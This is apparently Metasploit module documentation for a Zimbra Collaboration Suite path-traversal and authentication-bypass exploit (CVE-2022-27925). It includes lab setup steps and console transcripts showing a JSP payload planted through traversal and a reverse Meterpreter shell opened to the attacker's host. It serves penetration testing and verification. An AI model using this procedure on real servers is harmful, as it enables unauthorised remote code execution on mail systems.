## Vulnerable Application

This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability
in the following versions of Zimbra Collaboration Suite:

* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

Note that the open source edition is not affected.

Successful exploitation results in RCE as the `zimbra` user.

Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12,
which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.

To set the server up:
1. `wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz` on a Ubuntu 18.04 VM.
1. `tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz`
1. `hostnamectl set-hostname <hostname of your choice>` to set the hostname for the VM.
1. Edit the `/etc/hosts` file and add in a line `127.0.0.1 <hostname of your choice>`
1. `cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh`
1. Answer `Y` to every question.
1. You will need to wait a while whilst some stuff is set up. You should then get to a menu.
1. Use the number keys to select the menu options.
1. Configure the rest of the options such as the admin password, and full path to license file.
1. Once everything is configured you should get a prompt to press `a` to save and install. Press `a` when this appears.
1. You will then be prompted to save the configuration. Accept this and respond `Y` to any further prompts.
1. Server should start installing. Once its finished you should be ready to test.

Once the server is up, it's vulnerable.

```
msf > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
```

There's no easy way that I see to check for the patch (and the only vulnerable version I have is
quite a bit older), so attempts to exploit patched versions will likely result in a warning message
that the target may not vulnerable:

```
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/gauca.jsp
[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
[*] Exploit completed, but no session was created.
```

## Verification Steps
1. `use exploit/linux/http/zimbra_mboximport_cve_2022_27925`
1. `set RHOSTS <TARGET HOSTS>`
1. `set LHOST <Address of Attacking Machine>`
1. `exploit`
1. You should get a shell as the `zimbra` user.

## Options

### `TARGET_PATH`

The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.

### `TARGET_FILENAME`

The actual filename. It really should end with `.jsp`, otherwise it won't execute.

By default, it's a random string with `.jsp` on the end. That should work fine, especially
because we can't overwrite files and don't want to use the same payload name more than once.

### `TARGET_USERNAME`

The username included in the `mboximport` request - any valid username works, `admin` is usually fine.

## Scenarios

### Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04

```
msf > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options

Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):

   Name             Current Setting                                                                   Required  Description
   ----             ---------------                                                                   --------  -----------
   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            7071                                                                              yes       The target port (TCP)
   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
   VHOST                                                                                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/nkxj.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700

meterpreter > getuid
Server username: zimbra

meterpreter > shell
Process 121849 created.
Channel 1 created.
/opt/zimbra/bin/zmcontrol -v
Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.
```

### Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04

Note: This version is not vulnerable, because the issue is patched

```
msf > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
RHOSTS => 10.0.0.167
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/gauca.jsp
[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
[*] Exploit completed, but no session was created.
```

### Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04

Note: This version is not vulnerable, the open source edition doesn't have the correct path.

```
msf > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
RHOSTS => 10.0.0.164
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
[*] Sending POST request with ZIP file
[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
[*] Exploit completed, but no session was created.
```
